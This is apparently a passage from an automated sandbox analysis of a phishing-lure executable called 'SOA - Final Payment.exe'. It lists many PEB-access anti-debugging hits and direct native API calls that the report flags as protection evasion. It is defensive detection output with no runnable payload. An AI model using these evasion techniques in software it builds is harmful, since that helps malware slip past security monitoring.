                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013450D9 mov eax, dword ptr fs:[00000030h]5_2_013450D9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED0C0 mov eax, dword ptr fs:[00000030h]5_2_012ED0C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED0C0 mov eax, dword ptr fs:[00000030h]5_2_012ED0C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F20DE mov eax, dword ptr fs:[00000030h]5_2_012F20DE
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012990DB mov eax, dword ptr fs:[00000030h]5_2_012990DB
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F32A mov eax, dword ptr fs:[00000030h]5_2_0129F32A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01267330 mov eax, dword ptr fs:[00000030h]5_2_01267330
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D mov eax, dword ptr fs:[00000030h]5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D mov eax, dword ptr fs:[00000030h]5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C310 mov ecx, dword ptr fs:[00000030h]5_2_0126C310
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01290310 mov ecx, dword ptr fs:[00000030h]5_2_01290310
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131437C mov eax, dword ptr fs:[00000030h]5_2_0131437C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F367 mov eax, dword ptr fs:[00000030h]5_2_0132F367
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133A352 mov eax, dword ptr fs:[00000030h]5_2_0133A352
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C mov eax, dword ptr fs:[00000030h]5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C mov eax, dword ptr fs:[00000030h]5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov ecx, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345341 mov eax, dword ptr fs:[00000030h]5_2_01345341
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269353 mov eax, dword ptr fs:[00000030h]5_2_01269353
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269353 mov eax, dword ptr fs:[00000030h]5_2_01269353
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A33A0 mov eax, dword ptr fs:[00000030h]5_2_012A33A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A33A0 mov eax, dword ptr fs:[00000030h]5_2_012A33A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012933A5 mov eax, dword ptr fs:[00000030h]5_2_012933A5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129438F mov eax, dword ptr fs:[00000030h]5_2_0129438F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129438F mov eax, dword ptr fs:[00000030h]5_2_0129438F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134539D mov eax, dword ptr fs:[00000030h]5_2_0134539D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A mov eax, dword ptr fs:[00000030h]5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C739A mov eax, dword ptr fs:[00000030h]5_2_012C739A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012803E9 mov eax, dword ptr fs:[00000030h]5_2_012803E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013453FC mov eax, dword ptr fs:[00000030h]5_2_013453FC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F3E6 mov eax, dword ptr fs:[00000030h]5_2_0132F3E6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A63FF mov eax, dword ptr fs:[00000030h]5_2_012A63FF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E3F0 mov eax, dword ptr fs:[00000030h]5_2_0128E3F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B3D0 mov ecx, dword ptr fs:[00000030h]5_2_0132B3D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127A3C0 mov eax, dword ptr fs:[00000030h]5_2_0127A3C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012783C0 mov eax, dword ptr fs:[00000030h]5_2_012783C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F63C0 mov eax, dword ptr fs:[00000030h]5_2_012F63C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132C3CD mov eax, dword ptr fs:[00000030h]5_2_0132C3CD
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345227 mov eax, dword ptr fs:[00000030h]5_2_01345227
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126823B mov eax, dword ptr fs:[00000030h]5_2_0126823B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7208 mov eax, dword ptr fs:[00000030h]5_2_012A7208
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A7208 mov eax, dword ptr fs:[00000030h]5_2_012A7208
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01320274 mov eax, dword ptr fs:[00000030h]5_2_01320274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01274260 mov eax, dword ptr fs:[00000030h]5_2_01274260
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126826B mov eax, dword ptr fs:[00000030h]5_2_0126826B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133D26B mov eax, dword ptr fs:[00000030h]5_2_0133D26B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133D26B mov eax, dword ptr fs:[00000030h]5_2_0133D26B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B1270 mov eax, dword ptr fs:[00000030h]5_2_012B1270
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B1270 mov eax, dword ptr fs:[00000030h]5_2_012B1270
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01299274 mov eax, dword ptr fs:[00000030h]5_2_01299274
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B256 mov eax, dword ptr fs:[00000030h]5_2_0132B256
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132B256 mov eax, dword ptr fs:[00000030h]5_2_0132B256
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269240 mov eax, dword ptr fs:[00000030h]5_2_01269240
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269240 mov eax, dword ptr fs:[00000030h]5_2_01269240
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A724D mov eax, dword ptr fs:[00000030h]5_2_012A724D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F8243 mov eax, dword ptr fs:[00000030h]5_2_012F8243
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F8243 mov ecx, dword ptr fs:[00000030h]5_2_012F8243
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A250 mov eax, dword ptr fs:[00000030h]5_2_0126A250
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01276259 mov eax, dword ptr fs:[00000030h]5_2_01276259
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD250 mov ecx, dword ptr fs:[00000030h]5_2_012FD250
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802A0 mov eax, dword ptr fs:[00000030h]5_2_012802A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012802A0 mov eax, dword ptr fs:[00000030h]5_2_012802A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012852A0 mov eax, dword ptr fs:[00000030h]5_2_012852A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013072A0 mov eax, dword ptr fs:[00000030h]5_2_013072A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013072A0 mov eax, dword ptr fs:[00000030h]5_2_013072A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov ecx, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013062A0 mov eax, dword ptr fs:[00000030h]5_2_013062A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov eax, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov eax, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov ecx, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F92BC mov ecx, dword ptr fs:[00000030h]5_2_012F92BC
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013392A6 mov eax, dword ptr fs:[00000030h]5_2_013392A6
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F0283 mov eax, dword ptr fs:[00000030h]5_2_012F0283
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE284 mov eax, dword ptr fs:[00000030h]5_2_012AE284
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AE284 mov eax, dword ptr fs:[00000030h]5_2_012AE284
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A329E mov eax, dword ptr fs:[00000030h]5_2_012A329E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\SOA - Final Payment.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtSetInformationProcess: Direct from: 0x77542C5C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtOpenKeyEx: Direct from: 0x77542B9C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtProtectVirtualMemory: Direct from: 0x77537B2E
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtCreateFile: Direct from: 0x77542FEC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtOpenFile: Direct from: 0x77542DCC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQueryInformationToken: Direct from: 0x77542CAC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtTerminateThread: Direct from: 0x77542FCC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtDeviceIoControlFile: Direct from: 0x77542AEC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtAllocateVirtualMemory: Direct from: 0x77542BEC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtOpenSection: Direct from: 0x77542E0C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtAllocateVirtualMemory: Direct from: 0x775448EC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtSetInformationThread: Direct from: 0x775363F9
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQuerySystemInformation: Direct from: 0x775448CC
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtClose: Direct from: 0x77542B6C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtReadVirtualMemory: Direct from: 0x77542E8C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtCreateKey: Direct from: 0x77542C6C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtSetInformationThread: Direct from: 0x77542B4C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQueryAttributesFile: Direct from: 0x77542E6C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtAllocateVirtualMemory: Direct from: 0x77543C9C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtCreateUserProcess: Direct from: 0x7754371C
                Source: C:\Program Files (x86)\BXHUPDJQADAcjvpDMYoaiMasVRHZoQvMhhLBsAXMlHmrldwCfQCCyLMmATzPUYnAfvwHFmdtSq\6UCrnFl0sVXS7jZvJ.exe NtQueryInformationProcess: Direct from: 0x77542C26
